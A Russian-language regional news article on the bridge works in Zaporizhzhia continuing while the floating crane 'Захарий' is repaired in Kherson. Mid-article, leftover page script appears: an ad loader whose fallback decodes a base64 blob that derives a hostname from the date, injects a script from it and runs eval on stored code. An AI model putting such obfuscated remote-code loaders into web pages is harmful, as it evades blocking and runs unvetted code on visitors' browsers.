Строительство запорожских мостов без «Захария»: что удалось уже сделать на сегодняшний день (ФОТО)

В Запорожье продолжается строительство мостов без плавкрана «Захария», который отправили на месяц в Херсон с целью устранения поломки.

Как рассказали в Службе автомобильных дорог, работы продолжаются сразу на нескольких объектах. Мостостроители работают круглосуточно, благодаря чему почти каждую неделю появляются новые промежуточные результаты.

На сегодняшний день, 18 мая, работники генподрядной и подрядных организаций завершили бетонирование первой захватки для устройства плиты проезжей части на подходе к низовой части балочного моста со стороны острова Хортица (сооружение № 5н). Длина захватки — 34 м, объем уложенного бетона — 163 куб.м.

По низовой части балочного моста ведутся работы и на сооружениях №№ 3Н и 4н. На сооружении № 3н (подходы к мосту со стороны Хортицкого р-на) уже смонтированы и заварены 8 монтажных блоков коробчатой ​​балки пролетного строения (275,12т).

Остальные блоки будут монтироваться после завершения надвигающейся сооружения №4 на капитальные опоры. На сооружении № 4 (балочный мост) продолжается сбор секции №3 пролетного строения сооружения. Там мостостроители уже смонтировали 8 главных балок, 8 нижних и 7 верхних ортотропных плит, а также 9 консольных плит.

Продолжаются работы и на объекте строительства вантового моста и подхода к нему. На сооружении № 9в (подход к верховой части моста) мостостроители монтируют четыре временные опоры, на которые будут устанавливаться секции пролетного строения. На сооружении № 10в пока продолжаются работы по устройству буронабивных свай временной опоры ВО-3Н. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

На эстакаде, над кольцом на острове Хортица (сооружение № 6н), подрядчики уже выполнили монтаж 10 железобетонных балок пролетного строения в пролете 2-3, и 10 балок в пролете 3-4. Обе длиной по 33 м.

На строительной площадке № 1 в районе Кривой бухты мостостроители уже начали сбор секции № 6 пролетного строения. По состоянию на 18.05 смонтировано 2 главные балки.

Напомним, как ранее сообщал «Акцент», 6 мая знаменитый плавкран наткнулся на подводную скалу. Вчера, 12 мая, он отправился в Херсон, где его будут ремонтировать. На дорогу в одну сторону ему нужно примерно три дня. А сам ремонт может затянуться на несколько недель.

Как рассказал заместитель начальника Службы автомобильных дорог в Запорожской области Александр Шандыба, повреждение днища не глобальное, имеет локальный характер. Впрочем, вернуться в работу кран сможет только после того, как в заводских условиях будет выполнено его обследование и ремонт. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/stroitelstvo-zaporozhskih-mostov-bez-zahariya-chto-udalos-uzhe-sdelat-na-segodnyashnij-den-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top